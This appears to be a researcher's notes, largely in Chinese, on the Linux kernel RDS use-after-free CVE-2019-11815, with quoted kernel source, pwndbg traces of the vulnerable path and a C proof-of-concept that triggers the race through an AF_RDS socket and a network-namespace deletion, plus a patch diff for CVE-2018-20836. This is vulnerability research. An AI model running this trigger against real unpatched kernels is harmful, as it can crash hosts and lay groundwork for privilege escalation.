CVE-2019-11815
> An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.
> When it is to cleanup net namespace, rds_tcp_exit_net() will call
> rds_tcp_kill_sock(), if t_sock is NULL, it will not call
> rds_conn_destroy(), rds_conn_path_destroy() and rds_tcp_conn_free() to free
> connection, and the worker cp_conn_w is not stopped, afterwards the net is freed in
> net_drop_ns(); While cp_conn_w rds_connect_worker() will call rds_tcp_conn_path_connect()
> and reference 'net' which has already been freed.
```c
#define list_for_each_entry_safe(pos, tmp, head, member) \
for (pos = __container_of((head)->next, pos, member), \
tmp = __container_of(pos->member.next, pos, member); \
&pos->member != (head); \
pos = tmp, tmp = __container_of(pos->member.next, tmp, member))
static void rds_tcp_kill_sock(struct net *net)
{
struct rds_tcp_connection *tc, *_tc;
LIST_HEAD(tmp_list);
struct rds_tcp_net *rtn = net_generic(net, rds_tcp_netid);
struct socket *lsock = rtn->rds_tcp_listen_sock;
rtn->rds_tcp_listen_sock = NULL;
rds_tcp_listen_stop(lsock, &rtn->rds_tcp_accept_w);
spin_lock_irq(&rds_tcp_conn_lock);
list_for_each_entry_safe(tc, _tc, &rds_tcp_conn_list, t_tcp_node) {
struct net *c_net = read_pnet(&tc->t_cpath->cp_conn->c_net);
if (net != c_net || !tc->t_sock)
continue;
if (!list_has_conn(&tmp_list, tc->t_cpath->cp_conn)) {
list_move_tail(&tc->t_tcp_node, &tmp_list);
} else {
list_del(&tc->t_tcp_node);
tc->t_tcp_node_detached = true;
}
}
spin_unlock_irq(&rds_tcp_conn_lock);
list_for_each_entry_safe(tc, _tc, &tmp_list, t_tcp_node)
rds_conn_destroy(tc->t_cpath->cp_conn);
}
```
```c
tatic void __net_exit rds_tcp_exit_net(struct net *net)
{
struct rds_tcp_net *rtn = net_generic(net, rds_tcp_netid);
rds_tcp_kill_sock(net);
if (rtn->rds_tcp_sysctl)
unregister_net_sysctl_table(rtn->rds_tcp_sysctl);
if (net != &init_net)
kfree(rtn->ctl_table);
}
static struct pernet_operations rds_tcp_net_ops = {
.init = rds_tcp_init_net,
.exit = rds_tcp_exit_net,
.id = &rds_tcp_netid,
.size = sizeof(struct rds_tcp_net),
};
static void rds_tcp_exit(void)
{
rds_tcp_set_unloading();
synchronize_rcu();
rds_info_deregister_func(RDS_INFO_TCP_SOCKETS, rds_tcp_tc_info);
#if IS_ENABLED(CONFIG_IPV6)
rds_info_deregister_func(RDS6_INFO_TCP_SOCKETS, rds6_tcp_tc_info);
#endif
unregister_pernet_device(&rds_tcp_net_ops);
rds_tcp_destroy_conns();
rds_trans_unregister(&rds_tcp_transport);
rds_tcp_recv_exit();
kmem_cache_destroy(rds_tcp_conn_slab);
}
module_exit(rds_tcp_exit);
static int rds_tcp_init(void)
{
int ret;
rds_tcp_conn_slab = kmem_cache_create("rds_tcp_connection",
sizeof(struct rds_tcp_connection),
0, 0, NULL);
if (!rds_tcp_conn_slab) {
ret = -ENOMEM;
goto out;
}
ret = rds_tcp_recv_init();
if (ret)
goto out_slab;
ret = register_pernet_device(&rds_tcp_net_ops);
if (ret)
goto out_recv;
rds_trans_register(&rds_tcp_transport);
rds_info_register_func(RDS_INFO_TCP_SOCKETS, rds_tcp_tc_info);
#if IS_ENABLED(CONFIG_IPV6)
rds_info_register_func(RDS6_INFO_TCP_SOCKETS, rds6_tcp_tc_info);
#endif
goto out;
out_recv:
rds_tcp_recv_exit();
out_slab:
kmem_cache_destroy(rds_tcp_conn_slab);
out:
return ret;
}
```
socket的调用:
```
SYSCALL_DEFINE3(socket, int, family, int, type, int, protocol)
{
return __sys_socket(family, type, protocol);
}
int __sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;
int flags;
/* Check the SOCK_* constants for consistency. */
BUILD_BUG_ON(SOCK_CLOEXEC != O_CLOEXEC);
BUILD_BUG_ON((SOCK_MAX | SOCK_TYPE_MASK) != SOCK_TYPE_MASK);
BUILD_BUG_ON(SOCK_CLOEXEC & SOCK_TYPE_MASK);
BUILD_BUG_ON(SOCK_NONBLOCK & SOCK_TYPE_MASK);
flags = type & ~SOCK_TYPE_MASK;
if (flags & ~(SOCK_CLOEXEC | SOCK_NONBLOCK))
return -EINVAL;
type &= SOCK_TYPE_MASK;
if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
return retval;
return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK));
}
int sock_create(int family, int type, int protocol, struct socket **res)
{
return __sock_create(current->nsproxy->net_ns, family, type, protocol, res, 0);
}
```
```c
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
/*
* Check protocol is in range
*/
if (family < 0 || family >= NPROTO)
return -EAFNOSUPPORT;
if (type < 0 || type >= SOCK_MAX)
return -EINVAL;
/* Compatibility.
This uglymoron is moved from INET layer to here to avoid
deadlock in module load.
*/
if (family == PF_INET && type == SOCK_PACKET) {
pr_info_once("%s uses obsolete (PF_INET,SOCK_PACKET)\n",
current->comm);
family = PF_PACKET;
}
err = security_socket_create(family, type, protocol, kern);
if (err)
return err;
/*
* Allocate the socket and allow the family to set things up. if
* the protocol is 0, the family is instructed to select an appropriate
* default.
*/
sock = sock_alloc();
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;
#ifdef CONFIG_MODULES
/* Attempt to load a protocol module if the find failed.
*
* 12/09/1996 Marcin: But! this makes REALLY only sense, if the user
* requested real, full-featured networking support upon configuration.
* Otherwise module support will break!
*/
if (rcu_access_pointer(net_families[family]) == NULL)
request_module("net-pf-%d", family);
#endif
rcu_read_lock();
pf = rcu_dereference(net_families[family]);
err = -EAFNOSUPPORT;
if (!pf)
goto out_release;
/*
* We will call the ->create function, that possibly is in a loadable
* module, so we have to bump that loadable module refcnt first.
*/
if (!try_module_get(pf->owner))
goto out_release;
/* Now protected by module ref count */
rcu_read_unlock();
err = pf->create(net, sock, protocol, kern);
if (err < 0)
goto out_module_put;
/*
* Now to bump the refcnt of the [loadable] module that owns this
* socket at sock_release time we decrement its refcnt.
*/
if (!try_module_get(sock->ops->owner))
goto out_module_busy;
/*
* Now that we're done with the ->create function, the [loadable]
* module can have its refcnt decremented
*/
module_put(pf->owner);
err = security_socket_post_create(sock, family, type, protocol, kern);
if (err)
goto out_sock_release;
*res = sock;
return 0;
out_module_busy:
err = -EAFNOSUPPORT;
out_module_put:
sock->ops = NULL;
module_put(pf->owner);
out_sock_release:
sock_release(sock);
return err;
out_release:
rcu_read_unlock();
goto out_sock_release;
}
```
syscall的第一个参数是domain, `#define AF_RDS 21`
比如IP对应的是2:
```
pwndbg> p net_families[2]
$9 = (const struct net_proto_family *) 0xffffffff81f149f0 <inet_family_ops>
pwndbg> p *net_families[2]
$21 = {
family = 2,
create = 0xffffffff818e0fa0 <inet_create>,
owner = 0x0 <irq_stack_union>
}
```
ipv6对应的是10
```
pwndbg> p net_families[10]
$19 = (const struct net_proto_family *) 0xffffffff81f18140 <inet6_family_ops>
pwndbg> p *net_families[10]
$22 = {
family = 10,
create = 0xffffffff81918fe0 <inet6_create>,
owner = 0x0 <irq_stack_union>
}
```
其他的对应的entry项可能是0,表示没有支持
```
pwndbg> p net_families[21]
$20 = (const struct net_proto_family *) 0x0 <irq_stack_union>
```
**重新编译内核,选择kconfig**
第二个参数是sock_type,这里是`SOCK_SEQPACKET = 5`
```
► 0xffffffff81822b62 <__sys_socket+82> call __sock_create <0xffffffff81820b70>
rdi: 0xffffffff825d2540 (init_net) ◂— 0x100000002
rsi: 0x15
rdx: 0x5
rcx: 0x0
r8: 0xffffc900001d7f08 ◂— 0x100
r9: 0x0
int __sock_create(struct net *net, int family, int type, int protocol, struct socket **res, int kern)
```
```c
pwndbg> p *(struct net *)0xffffffff825d2540
$1 = {
passive = {
refs = {
counter = 2
}
},
...
```
create:
```c
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
/*
* Check protocol is in range
*/
if (family < 0 || family >= NPROTO)
return -EAFNOSUPPORT;
if (type < 0 || type >= SOCK_MAX)
return -EINVAL;
// pass
/* Compatibility.
This uglymoron is moved from INET layer to here to avoid
deadlock in module load.
*/
if (family == PF_INET && type == SOCK_PACKET) {
pr_info_once("%s uses obsolete (PF_INET,SOCK_PACKET)\n",
current->comm);
family = PF_PACKET;
}
// pass
err = security_socket_create(family, type, protocol, kern);
// ► 0xffffffff81820bcc <__sock_create+92> call security_socket_create <0xffffffff813e5560>
// rdi: 0x15
// rsi: 0x5
// rdx: 0x0
// rcx: 0x0
// pass eax = 0
if (err)
return err;
/*
* Allocate the socket and allow the family to set things up. if
* the protocol is 0, the family is instructed to select an appropriate
* default.
*/
sock = sock_alloc();
// sock = 0xffff888006099180
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;
//sock = {
// state = SS_UNCONNECTED,
// type = 5,
// flags = 0,
// wq = 0xffff888005a8ca40,
// file = 0x0 <irq_stack_union>,
// sk = 0x0 <irq_stack_union>,
// ops = 0x0 <irq_stack_union>
//}
#ifdef CONFIG_MODULES
/* Attempt to load a protocol module if the find failed.
*
* 12/09/1996 Marcin: But! this makes REALLY only sense, if the user
* requested real, full-featured networking support upon configuration.
* Otherwise module support will break!
*/
if (rcu_access_pointer(net_families[family]) == NULL)
request_module("net-pf-%d", family);
#endif
rcu_read_lock();
pf = rcu_dereference(net_families[family]);
err = -EAFNOSUPPORT;
if (!pf)
goto out_release;
/*
* We will call the ->create function, that possibly is in a loadable
* module, so we have to bump that loadable module refcnt first.
*/
if (!try_module_get(pf->owner))
goto out_release;
/* Now protected by module ref count */
rcu_read_unlock();
err = pf->create(net, sock, protocol, kern);
if (err < 0)
goto out_module_put;
/*
* Now to bump the refcnt of the [loadable] module that owns this
* socket at sock_release time we decrement its refcnt.
*/
if (!try_module_get(sock->ops->owner))
goto out_module_busy;
/*
* Now that we're done with the ->create function, the [loadable]
* module can have its refcnt decremented
*/
module_put(pf->owner);
err = security_socket_post_create(sock, family, type, protocol, kern);
if (err)
goto out_sock_release;
*res = sock;
return 0;
out_module_busy:
err = -EAFNOSUPPORT;
out_module_put:
sock->ops = NULL;
module_put(pf->owner);
out_sock_release:
sock_release(sock);
return err;
out_release:
rcu_read_unlock();
goto out_sock_release;
}
```
__rcu: read, copy, use
```
struct net_proto_family {
int family;
int (*create)(struct net *net, struct socket *sock,
int protocol, int kern);
struct module *owner;
};
```
重新手动编译之后成功调用了rds的module,对应的结构如下:
```
pwndbg> p *net_families[21]
$2 = {
family = 21,
create = 0xffffffff81909a00 <rds_create>,
owner = 0x0 <irq_stack_union>
}
```
之后在\_\_sock\_create函数中的1276行成功调用了pf->create(net, sock, protocol, kern),也就是rds_create(net, sock, protocol, kern)
调用的参数是
```c
rdi: 0xffffffff8231ac00 (init_net) ◂— 0x100000002
rsi: 0xffff888006b93180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rdx: 0x0
rcx: 0x0
```
\_\_rds\_bind调用rds\_trans\_get\_preferred来指定trans的值
\_\_rds\_conn\_create里同样也有
sendmsg:
```c
► 0xffffffff817c6a3e <__sys_sendmsg+94> call ___sys_sendmsg <0xffffffff817c51f0>
rdi: 0xffff888006b97180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rsi: 0x7ffd0bcddda0 —▸ 0x7ffd0bcdddf0 ◂— add al, byte ptr [rax] /* 0x100007ff7130002 */
rdx: 0xffffc9000018fec0 ◂— 0x81efe0b0
rcx: 0x0
r8: 0x0
r9: 0x0
```
sock_sendmsg:
```c
► 0xffffffff817c54a7 <___sys_sendmsg+695> call sock_sendmsg <0xffffffff817c4dc0>
rdi: 0xffff888006b97180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rsi: 0xffffc9000018fec0 —▸ 0xffffc9000018fdc0 ◂— 0x100007ff7130002
```
rds_conn_create_outgoing in rds_sendmsg
```c
► 0xffffffff81911b89 <rds_sendmsg+1817> call rds_conn_create_outgoing <0xffffffff8190d310>
rdi: 0xffffffff8231ac00 (init_net) ◂— add al, byte ptr [rax] /* 0x200000002 */
rsi: 0xffff888005ed0750 ◂— 0
rdx: 0xffffc9000018fca0 ◂— 0x0
rcx: 0xffffffff8232c340 (rds_loop_transport) ◂— insb byte ptr [rdi], dx /* 0x6b636162706f6f6c; 'loopback' */
r8: 0x6000c0
r9: 0x0
```
__rds_conn_create():
```c
► 0xffffffff8190d31d <rds_conn_create_outgoing+13> call __rds_conn_create <0xffffffff8190ca10>
rdi: 0xffffffff8231ac00 (init_net) ◂— add al, byte ptr [rax] /* 0x200000002 */
rsi: 0xffff888005ed0750 ◂— 0
rdx: 0xffffc9000018fca0 ◂— 0x0
rcx: 0xffffffff8232c340 (rds_loop_transport) ◂— insb byte ptr [rdi], dx /* 0x6b636162706f6f6c; 'loopback' */
r8: 0x6000c0
r9: 0x1
arg[6]: 0x0
```
这里ret = conn->c_trans->conn_path_connect(cp),函数指针指向0xffffffff81913510 (rds_loop_conn_path_connect)
```c
► 0xffffffff81912eab <rds_connect_worker+107> call __x86_indirect_thunk_rax <0xffffffff81c00ca0>
rdi: 0xffff888005f77a00 —▸ 0xffff88800583f000 ◂— 0
rsi: 0x40
rdx: 0x1
rcx: 0xffff88800703a020 ◂— 0xffff88800703a020
```
这个关键函数长这样
```c
struct rds_transport *rds_trans_get_preferred(struct net *net,
const struct in6_addr *addr,
__u32 scope_id)
{
struct rds_transport *ret = NULL;
struct rds_transport *trans;
unsigned int i;
if (ipv6_addr_v4mapped(addr)) {
if (*(u_int8_t *)&addr->s6_addr32[3] == IN_LOOPBACKNET)
return &rds_loop_transport;
} else if (ipv6_addr_loopback(addr)) {
return &rds_loop_transport;
}
down_read(&rds_trans_sem);
for (i = 0; i < RDS_TRANS_COUNT; i++) {
trans = transports[i];
if (trans && (trans->laddr_check(net, addr, scope_id) == 0) &&
(!trans->t_owner || try_module_get(trans->t_owner))) {
ret = trans;
break;
}
}
up_read(&rds_trans_sem);
return ret;
}
```
其中全局变量transports:
```c
pwndbg> p transports
$44 = {0x0 <irq_stack_union>, 0x0 <irq_stack_union>, 0xffffffff8232c4e0 <rds_tcp_transport>}
pwndbg> p transports[2]->laddr_check
$45 = (int (*)(struct net *, const struct in6_addr *, __u32)) 0xffffffff81915900 <rds_tcp_laddr_check>
```
我们想让trans保存成rds_tcp_transport
```c
static int rds_tcp_laddr_check(struct net *net, const struct in6_addr *addr,
__u32 scope_id)
{
struct net_device *dev = NULL;
#if IS_ENABLED(CONFIG_IPV6)
int ret;
#endif
if (ipv6_addr_v4mapped(addr)) {
if (inet_addr_type(net, addr->s6_addr32[3]) == RTN_LOCAL) // 需要手动指定 路由表
return 0;
return -EADDRNOTAVAIL;
}
/* If the scope_id is specified, check only those addresses
* hosted on the specified interface.
*/
if (scope_id != 0) { // 我没找到让scope_id不为零的path...
rcu_read_lock();
dev = dev_get_by_index_rcu(net, scope_id);
/* scope_id is not valid... */
if (!dev) {
rcu_read_unlock();
return -EADDRNOTAVAIL;
}
rcu_read_unlock();
}
#if IS_ENABLED(CONFIG_IPV6)
ret = ipv6_chk_addr(net, addr, dev, 0);
if (ret)
return 0;
#endif
return -EADDRNOTAVAIL;
}
```
要通过laddr_check的检查
```c
// 上层传参是net, addr->s6_addr32
// ► 0xffffffff8191594f <rds_tcp_laddr_check+79> call inet_addr_type <0xffffffff81886310>
// rdi: 0xffffffff8231ac00 (init_net) ◂— 0x200000002
// rsi: 0xa0ad60a
// 传参是net, NULL, addr, RT_TABLE_LOCAL
static inline unsigned int __inet_dev_addr_type(struct net *net,
const struct net_device *dev,
__be32 addr, u32 tb_id)
{
struct flowi4 fl4 = { .daddr = addr };
struct fib_result res;
unsigned int ret = RTN_BROADCAST;
struct fib_table *table;
if (ipv4_is_zeronet(addr) || ipv4_is_lbcast(addr)) // 是0.x.x.x / ff
return RTN_BROADCAST;
if (ipv4_is_multicast(addr)) // D类地址
return RTN_MULTICAST;
rcu_read_lock();
table = fib_get_table(net, tb_id);
if (table) {
ret = RTN_UNICAST;
if (!fib_table_lookup(table, &fl4, &res, FIB_LOOKUP_NOREF)) {
if (!dev || dev == res.fi->fib_dev)
ret = res.type;
}
}
rcu_read_unlock();
return ret;
}
```
调用rds_tcp_conn_path_connect
```c
► 0xffffffff81912eab <rds_connect_worker+107> call __x86_indirect_thunk_rax <0xffffffff81c00ca0>
rdi: 0xffff888005f7c000 —▸ 0xffff88800582f000 ◂— 0
rsi: 0x40
rdx: 0x1
rcx: 0xffff88800703a020 ◂— 0xffff88800703a020
```
总结:
rds_bind 调用 rds_trans_get_preferred 调用 laddr_check,也就是 rds_tcp_laddr_check,会调用inet_addr_type来判断网络是否为RTN_LOCAL(macro: 2),如果是则返回0,除此之外进行的判断是
```c
if (trans && (trans->laddr_check(net, addr, scope_id) == 0) &&
(!trans->t_owner || try_module_get(trans->t_owner))) {
ret = trans;
break;
}
```
如果成功返回了rds_tcp_trans就可以在rs->rs_transport里保存tcp的vtable
之后在rds_sendmsg中调用rds_conn_create_outgoing调用__rds_conn_create,
那么在\_\_rds_sendmsg中也会进行一样的检查,然后赋值trans,于是在\_\_rds_conn_path_init函数中的INIT_WORK会调用rds_connect_worker,这其中会调用conn->c_trans->conn_path_connect(cp),如果失败会调用rds_queue_reconnect,同时在rds_tcp_restore_callback把t_socks设置为null,这样在umount和unlink的syscall调用rds_tcp_kill_sock()的时候就不会清除worker进程,同时global variable的net被free,但是回调函数conn_path_connect依然会引用net,造成uaf
Inet_addr_type 的asm代码有点意思
trans的t_type的几种类型
```c
#define RDS_TRANS_IB 0
#define RDS_TRANS_IWARP 1
#define RDS_TRANS_TCP 2
#define RDS_TRANS_COUNT 3
#define RDS_TRANS_NONE (~0)
```
rds\_tcp\_init\_net调用INIT_WORK(&rtn->rds_tcp_accept_w, rds_tcp_accept_worker)
rds_tcp_accept_worker调用rds\_tcp\_accept\_one
rds\_tcp\_accept\_one调用rds\_conn\_create
rds\_conn\_create和rds\_conn\_create\_outgoing调用__rds_conn_create
\_\_rds\_conn\_create()调用__rds_conn_path_init
\_\_rds\_conn\_path\_init调用INIT_DELAYED_WORK(&cp->cp_conn_w, rds_connect_worker)
reconnect: 0xffffffff81913510
sock_sendmsg -> sock_sendmsg_nosec -> sock->ops->sendmsg(rds_sendmsg)
sock at 0xffff888006b97180
file at 0xffff888006479600
fd = 3
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#define RECVPORT 5111
#define SENDPORT 6111
#define PF_RDS AF_RDS
#define AF_RDS 21
int main(int argc, char *argv[]) {
int s, ret2;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_STREAM, 0);
if (s < 0) {
printf("blacklisted.\n");
}
memset(&addr, 0, sizeof(addr));
addr.sin_addr.s_addr = inet_addr("10.0.10.214"); // 本地RTN_LOCAL地址
addr.sin_family = AF_INET;
addr.sin_port = htons(5111);
ret2 = bind(s, (struct sockaddr *)&addr, sizeof(addr));
if (ret2 < 0) {
printf("failed binding.\n");
}
// try to send message
int size, ret;
struct sockaddr_in recvaddr;
struct msghdr msg;
struct iovec iov;
unsigned long buf;
memset(&recvaddr, 0, sizeof(recvaddr));
size = sizeof(recvaddr);
recvaddr.sin_port = htons(RECVPORT);
recvaddr.sin_family = AF_INET;
recvaddr.sin_addr.s_addr = inet_addr("114.114.114.114"); // 需要外部地址
memset(&msg, 0, sizeof(msg));
msg.msg_name = &recvaddr;
msg.msg_namelen = sizeof(recvaddr);
msg.msg_iovlen = 1;
buf = 0xffffffff;
iov.iov_len = sizeof(buf);
iov.iov_base = &buf;
msg.msg_iov = &iov;
ret = sendmsg(ret2, &msg, 0);
if (ret < 0) {
printf("failed to send.\n");
}
printf("sent.\n");
return 0;
}
```
在外面ipnetns delete即可
CVE-2018-20836
> An issue was discovered in the Linux kernel before 4.20. There is a race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c, leading to a use-after-free.
```c
diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
index 5222294..0d1f727 100644
--- a/drivers/scsi/libsas/sas_expander.c
+++ b/drivers/scsi/libsas/sas_expander.c
@@ -48,17 +48,16 @@ static void smp_task_timedout(struct timer_list *t)
unsigned long flags;
spin_lock_irqsave(&task->task_state_lock, flags);
- if (!(task->task_state_flags & SAS_TASK_STATE_DONE))
+ if (!(task->task_state_flags & SAS_TASK_STATE_DONE)) {
task->task_state_flags |= SAS_TASK_STATE_ABORTED;
+ complete(&task->slow_task->completion);
+ }
spin_unlock_irqrestore(&task->task_state_lock, flags);
-
- complete(&task->slow_task->completion);
}
static void smp_task_done(struct sas_task *task)
{
- if (!del_timer(&task->slow_task->timer))
- return;
+ del_timer(&task->slow_task->timer);
complete(&task->slow_task->completion);
}
```